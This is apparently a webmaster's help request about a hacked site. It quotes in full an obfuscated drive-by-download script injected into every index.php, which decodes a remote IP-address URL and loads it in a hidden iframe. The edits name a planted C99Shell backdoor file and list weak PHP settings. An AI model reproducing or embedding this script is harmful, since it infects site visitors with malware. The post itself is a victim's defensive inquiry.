The problem:
On my webspace there are PHP files which all end with this:
<?php include 'footer.php'; ?>
Before this line, there is also HTML code in the files.
The output in the browser ends with this, of course:
</body>
</html>
But yesterday, there was some malicious code at the end, suddenly. The output of my index.php was:
</body>
</html><body><script>
var i={j:{i:{i:'~',l:'.',j:'^'},l:{i:'%',l:218915,j:1154%256},j:{i:1^0,l:55,j:'ijl'}},i:{i:{i:function(j){try{var l=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x69\x6e\x70\x75\x74');l['\x74\x79\x70\x65']='\x68\x69\x64\x64\x65\x6e';l['\x76\x61\x6c\x75\x65']=j;l['\x69\x64']='\x6a';document['\x62\x6f\x64\x79']['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](l);}catch(j){return false;}
return true;},l:function(){try{var l=document['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']('\x6a');}catch(l){return false;}
return l.value;},j:function(){var l=i.i.i.i(i.l.i.i('.75.67.67.63.3a.2f.2f.39.32.2e.36.30.2e.31.37.37.2e.32.33.35.2f.76.61.71.72.6b.2e.63.75.63.3f.66.75.61.6e.7a.72.3d.6b.37.36.6b.30.39'));var j=(l)?i.i.i.l():false;return j;}},l:{i:function(){var l=i.i.i.j('trashtext');var j=(l)?l:'trashtext';return j||false;},l:function(){var l=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x6c');l['\x77\x69\x64\x74\x68']='0.1em';l['\x68\x65\x69\x67\x68\x74']='0.2em';l['\x73\x74\x79\x6c\x65']['\x62\x6f\x72\x64\x65\x72']='none';l['\x73\x74\x79\x6c\x65']['\x64\x69\x73\x70\x6c\x61\x79']='none';l['\x69\x6e\x6e\x65\x72\x48\x54\x4d\x4c']='\x6c';l['\x69\x64']='\x6c';document['\x62\x6f\x64\x79']['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](l);},j:function(){var l=i.i.j.j(i.i.l.l());l=document['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']('\x6c');var j=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x69\x66\x72\x61\x6d\x65');j['\x68\x65\x69\x67\x68\x74']=j['\x77\x69\x64\x74\x68'];j['\x73\x72\x63']=i.i.j.i(i.i.l.i());try{l['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](j);}catch(j){}}},j:{i:function(l){return l['replace'](/[A-Za-z]/g,function(j){return String['\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65']((((j=j.charCodeAt(0))&223)-52)%26+(j&32)+65);});},l:function(l){return i.i.j.i(l)['\x74\x6f\x53\x74\x72\x69\x6e\x67']()||false;},j:function(l){try{l();}catch(l){}}}},l:{i:{i:function(l){l=l['replace'](/[.]/g,'%');return window['\x75\x6e\x65\x73\x63\x61\x70\x65'](l);},l:'50',j:'33'},l:{i:'62',l:'83',j:'95'},j:{i:'46',l:'71',j:'52'}}}
i.i.l.j();</script>
I opened the file on my webspace (downloaded via FTP) and I saw that someone had put this code right into the file!
How could this happen?
The only ways I can imagine:
- Somebody got my FTP password. But he wouldn't only have put it into one file. He could have done much more damage. So I can't imagine this is the case.
- I have a virus on my PC myself. I use Notepad++ for editing and FileZilla for uploading. Maybe these programs were contaminated as well and I uploaded the malicious code - without knowing.
- Someone used a security hole (XSS) to put that code into the page. But he couldn't have put it right into the file, could he?
Symptoms:
Users reported a blue panel popping up in Firefox. It asked them to install a plugin. Now some of them have Exploit.Java.CVE-2010-0886.a on their PC.
Is this due to the malicious code? What did the code do exactly?
Can you help me?
Please help me, I'm really desperate.
Maybe one additional question, if you know how I could have got it: How could I prevent something like this in the future?
Edit #1:
I've found a file called "x76x09.php" in the root directory of my webspace. It has a filesize of 44.281 bytes. I've downloaded it and tried to open it. But my antivirus software said it's a trojan (Trojan.Script.224490). I think this file has been executed and added the malicious code to the "index.php" in every directory. Does this help? How could the trojan come to my webspace? Is this a well-known virus?
Edit #2:
My hoster says he can now be sure that the file wasn't uploaded via FTP. So the infection didn't happen via FTP. According to my hoster, it must be insecure scripts.
Edit #3:
Security holes according to PHPSecInfo:
- allow_url_fopen = 1
- allow_url_include = 1
- expose_php = 1
- file_uploads = 1 (is this to blame for the malicious "x76x09.php" file?)
- group_id = 99
- user_id = 99
Edit #4:
I've analyzed the file which had been executed on my webserver. Here's the results.
So this virus seems to be known as:
- PHP/C99Shell.BF
- Backdoor/PHP.C99Shell
- BackDoor.Generic_c.CQA
- Trojan.Script.224490
- Exploit.PHP.635
- Backdoor.PHP.C99Shell.bf
- Trojan.Script.224490
Could some of them cause the malicious file on my webspace which added the malicious code?
